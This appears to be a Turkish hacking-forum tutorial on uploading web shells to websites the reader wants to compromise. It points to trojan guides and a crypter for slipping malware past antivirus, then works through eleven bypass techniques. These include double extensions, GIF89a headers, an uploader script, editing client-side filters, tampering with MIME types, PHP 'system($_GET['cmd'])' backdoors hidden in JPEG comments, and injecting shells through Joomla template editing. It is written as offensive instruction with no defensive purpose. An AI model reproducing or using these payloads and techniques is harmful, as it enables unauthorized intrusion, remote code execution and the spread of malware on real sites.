Sosyal Mühendislik ile Website Hacklemek

AWS'de port açmak için:

https://youtu.be/FMcJ2OGaaP0

Windows sunucuda port açmak için:

https://youtu.be/ZOTDZ2PEB1s

Genişletmek için tıkla ...

Exe'yi farklı dosya biçimlerine dönüştürmek için:
https://youtu.be/ASVMQSZbcCc

Trojan kurulumları için:
https://www.turkhackteam.org/trojan-ve-virusler/

Virüsü antivirüslerden gizlemek için (crypter):
crypter.com

Genişletmek için tıkla ...

Shell Nedir?

Shell kavramı özellikle bizlerin web hacking olaylarında kullandığımız araçlardan birtanesidir. internet sitelerinde belirli yetkiler almamızı sağlayan (yetki yükseltmekten bahsediyorum) ve bu aldığımız yetkilerle siteler üzerinde çeşitli işler yapabilmemize olanak tanıyan kod sistemleridir. Yetki yükseltme bazı durumlar mevcut dosya ve dizinleri okuma yazma gibi olabilir. bazı durumlarda ise okuma yazma çalıştırma silme gibi tam yetkilere sahip olabiliyoruz. Tam yetki alabilmemiz içn tabi girilen sunucuda gerekli sunucu versiyonuna uygun exploit var ise exploit edilmesi gerekiyor.bunun sonucunda root yetkisi alıp işlem yapabiliyoruz.

Şimdi exploit kavramınada girip yukarıda bahsettiğimiz için exploit nedir bunuda kısaca bir tanımlayalım.

Exploit Nedir?

Bilgisayar, yazılım, program ve dijital herhangi bir sistem üzerinde sistem açıklarından, kod hatalarından faydalanarak istenmeyen hatalar oluşturmak için düzenlenmiş küçük kod ve program parçalarıdır. genel olarak Ruby ve Python dillerinde yazılırlar. Yazılan bir exploit düzgün yazılmış ise kesin sonuç döndürür. Günümüzde güncel exploitleri takip edebilmek için bazı siteler mevcuttur. bunlardan birkaç tanesini aşağıya yazıyorum.

• Exploit-DB
  
• Enigma Group
  
• CX-Security

Evet şimdi genel olarak exploiti shelli tanımladığımıza göre artık kafamızda birşeyler oluşmaya başlamıştır sanırım. artık shell atma yöntemlerine geçebiliriz.

Shell Atma Yöntemleri Nelerdir?

1. Durum

RFI (Remote File İnclude) uzaktan dosya çalıştırma yönteminde her ne kadar bu yöntemde artık kullanılmasada hiç bulunmayacak diye birşey yok. günümüzde ki web masterler artık bu açıkları kapatabilecek kapasiteye sahipler. çalışma mantığı herhangi bir yere yüklenen bir shell dosyasını çağırarak shelli çalıştırmış oluruz. aşağıda bir örneğini bulabilirsiniz.



2.Durum

SQL injection metodu OWASP Top 10 da en tehlikeli web hacking metodudur. Ve teknik olarak neredeyse tüm sitelerden bulunubilen bir açık türüdür. Sql ile komut çalıştırabilir. açık üzerinden siteye ait verileri çekebilir. hedef sitenin admin paneline çektiğimiz admin giriş bilgileri ile giriş yapıp çektiğiniz sitenin türüne göre içeri shell atmayı deneyebilirsiniz. Detaylar aşağıda;

3. Durum

Bazı sitelerde güvenlik mekanizması script tabanlı olabilir. Yani ne demek bu sunucudaki güvenlik sistemi (WAF) script dillerindeki kodların siteye upload edilmesine müsaade etmez. bizim shell dosyalarımız .PHP .ASP dillerinde olduğu için genellikle shellimizi bu durumdan ötürü upload edemeyiz. bunu bypass’lamak için shell dosyamızın sonuna .gif .jpeg .html gibi dosya uzantılıarını ekleyerek aşabiliriz.



4.Durum

Bazen shell atmak istediğiniz sunucuda bulunan WAF yine shell dosyanızı kabul etmeyecektir. Hatta yukarıda 3. durumda yaptığınız işlem sonrasında bile kabul etmeyebilir. bu durumda Shell dosyasını açıp dosyanın en üst kısmına GIF89a; yazıp kaydedip çıkın. bu şekilde shelli resim dosyasıymış gibi sunucuya yükleyebilirsiniz. Hatta 3. durumda anlattığım olay ile bunu birleştirip daha gerçekçi bir kompozisyon oluşturabilrsiniz.

5.Durum

Eğer Antivirus ve güvenlik duvarı attığınız shelli algılayıp siliyorsa bunun yerine basit bir uploader scripti yüklemeyi deneyin. ve daha sonra bu yüklediğiniz upload script ile shell dosyanızı upload etmeye çalışın. Örnek bir upload script kodu aşağıdadır.

Kod:

<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<bOdy>
<form enctype="multipart/form-data" action="upload.php" method="POST">
<p>Upload your file</p>
<input type="file" name="uploaded_file"></input><br />
<input type="submit" value="Upload"></input>
</form>
</bOdy>
</html>
<?PHP
if(!empty($_FILES[’uploaded_file’]))
{
$path = "uploads/";
$path = $path . basename( $_FILES[’uploaded_file’][’name’]);
if(move_uploaded_file($_FILES[’uploaded_file’][’tmp_name’], $path)) {
echo "The file ". basename( $_FILES[’uploaded_file’][’name’]).
" has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
?>

6. Durum

Bazı durumlarda shell yükleyeceğiniz site sunucu taraflı güvenlik yerine istemci tafarlı güvelik filtreleri çalışır. Bu gibi bir durumla karşılaşırsanız Mozilla için Firebug eklentisini indirip kurun ve upload html dosyasını aşağıdaki gibi düzenleyin.

Kod:

<form enctype=\"multipart/form-data\" action=\"uploader.php\" method=\"POST\"> Upload DRP File: <input name=\"Upload Saved Replay\" type=\"file\" accept=\"*.jpg\"/><br /> <input type=\"submit\" value=\"Upload File\" /> </form>

burdaki accept="*.jpg\\ kısmını accept="*.*\\ olarak değiştirip kayıt edin bu şekilde uzantı kontrolünü bypass edip shellinizi yükleyebilirsiniz.

7. Durum

Mozilla üzerine "LIVE HTTP HEADERS" eklentisini kurun Shellinizi adını yukarıda anlatıığım gibi shell.php.jpg olarak değiştirin veya shell yüklemek istediğiniz sitenin kabul ettiği herhangi bir formatta olabilir. Daha sonra firefox’unuzu açın ve yüklediğiniz Headers eklentisini başlatın ve daha sonra shellinizi upload edin. bu esnada eklentinizin ekranında gönderilen veriler akmaya başlayacaktır.



daha sonra shell.php.jpg olan kısmı bulun ve reply butonuna basın.



ikinci bir ekran açılacak ikinci ekranda shell dosyanızın ismini shell.php olarak değiştirin ardından bir daha reply butonuna basın. shelliniz sunucuya yüklenmiş olacaktır.

8. durum

"edjpgcom.exe" programını internetten indirin Program windows altında çalışan bir JPEG dosyasına yorum eklemenizi veya bir yorumu değiştirmenizi sağlar.



programı "edjpgcom" diye aratarak indirebilirsiniz.

şimdi bu programı bilgisayara indirdikten sonra bir jpeg dosyasını alın ve sürükleyip programın üstüne bırakın program açılacak yukarıdaki ekrandaki gibi bir ekran sizi karşılayacak. yorum yazılacak kısma ufak bir shell kodu yazıp kaydetip kapatın. Normal şartlarda bir shell dosyasının kodunu oraya yapıştırmamız mümkün değildir. o yüzden uzaktan kod çalıştırmamıza imkan verecek bir kod eklememiz işimizi koalylaştıracaktır. birkaç örnek aşağıdadır.

Kod:

"; system($_GET[’cmd’]); echo?>

veya

Kod:

<?php system($_GET["cmd"]); ?>

daha sona kaydedip çıkın. bu dosyayı sunucuya .php olarak upload ettiğinizde (yukarıdaki yöntemlerden birisinde anlattığım gibi) uzaktan kod çalıştırmasına olanak tanıyacakytır.

9. Durum

bazen serverı bypass ederken yine Mozilla’nın Tamper eklentisinden yararlanılır. bunun için store’den tamper data eklentisini kurun.



daha sonra shell atmak istediğiniz siteye gidin ve start tamper eklentisini çalıştırın.



daha sonra shellinizi upload edin. daha sonra Continue tampering ekranı gelecek tamper butonuna basarak devam edin.



gelen ekrandan post data kısmındaki verilerin içinden application/octet-stream kısmını bulup burayı image/gif yada image/jpg olarak değiştirin daha sonra submit butonuna tıklayarak devam edin bu yolla shellinizi resim dosya gibi sunucuya yükleyebilirsiniz.

10. Durum

çok nadirende olsa hacklemek istediğiniz sitede bir upload butonu bulursanız bunun yardımıyla siteye shellinizi yükleyebilirsiniz. bazende admin panelden giriş yaptığınızda panel üzerinde değişiklik yapıp editleyebileceğiniz ya da dosya yükleyeceğniz yer arayabilirsiniz. bunlardan herhangi birisini bulduğunuzda buralarda yukarıda anlattığım yolları deneyerek shellinizi yüklemeyi deneyebilrsiniz.

11. Durum

Diyelimki bir joomla site buldunuz ve bu siteye shell yükleme için aşağıdaki adımları takip edin.

admin panelden login olduktan sonra tema düzenleme yolu ile shell atabiliriz. Panelde Template Manager’a tıklayın daha sonra mevcut bulunan herhangi bir templateye tıklayın acılan sayfada sağ üst taraftan Edit butonuna tıklayın daha sonra Edit html butonuna tıklayın ve shell kodlarınızı buraya yapıştırın. Shell yolunuz http://hedefsite.com/templates/hedeftemplate/index.php olacaktır.

bir diğer yöntem yeni bir tema yüklem ile olabilir. bir joomla teması yükleyin internetten ve shell dosyanızı içerisine atın daha sonra temayı siteye yükleyin. Tema başarılı bir şekilde yüklendikten sonra shell yolunu yukarıda yazdığım linkleri gerekli yerleri düzelterek bulabilirsiniz.

üçüncü yöntem ise plugin yükleme yöntemi olabilir yine yukarıda anlattığım gibi bu sefer tema değil de aynı işi plugin ile yapabilirsiniz.

Genişletmek için tıkla ...